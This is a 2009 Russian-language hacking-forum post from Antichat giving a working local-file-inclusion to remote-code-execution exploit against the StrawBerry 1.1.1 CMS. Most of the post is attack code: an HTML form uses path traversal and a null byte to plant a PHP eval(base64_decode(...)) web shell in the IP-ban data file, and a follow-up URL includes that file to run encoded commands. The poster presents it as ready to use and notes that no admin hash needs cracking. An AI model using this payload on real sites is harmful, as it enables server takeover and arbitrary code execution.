HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

StrawBerry 1.1.1 LFI / Remote Code Execution Exploit
  #4  
Старый 10.05.2009, 13:09
[AVT]
Новичок
Регистрация: 20.12.2007
Сообщений: 19
С нами: 9680237

Репутация: 52
По умолчанию StrawBerry 1.1.1 LFI / Remote Code Execution Exploit

Развивая тему _http://forum.antichat.ru/showpost.php?p=953944&postcount=71

Выполняем POST-запрос:
Код:
<form method="post" action="http://localhost/strawberry/example/index.php?do=../../../../../inc/mod/ipban.mdu%00">
<input type="text" name="add_ip" value="<h1><?php eval(base64_decode($_GET[cmd]));?></h1>">
<input type="hidden" name="action" value="add">
<input type="hidden" name="mod" value="ipban">
<input type="submit" value="First time">
</form>
Шелл: http://localhost/strawberry/example/index.php?cmd=cGhwaW5mbygpOw==&do=../../../../db/base/ipban.MYD%00

+ Не нужно расшифровывать md5(md5()) хеш админа.

Уточнение: "/example/" - это не пример каталога, а папка в движке StrawBerry.

Последний раз редактировалось [AVT]; 10.05.2009 в 13:44..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
«Лаборатории Касперского»: Количество вредоносных программ под Linux резко возросло dinar_007 Мировые новости. Обсуждения. 9 20.08.2006 20:50



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.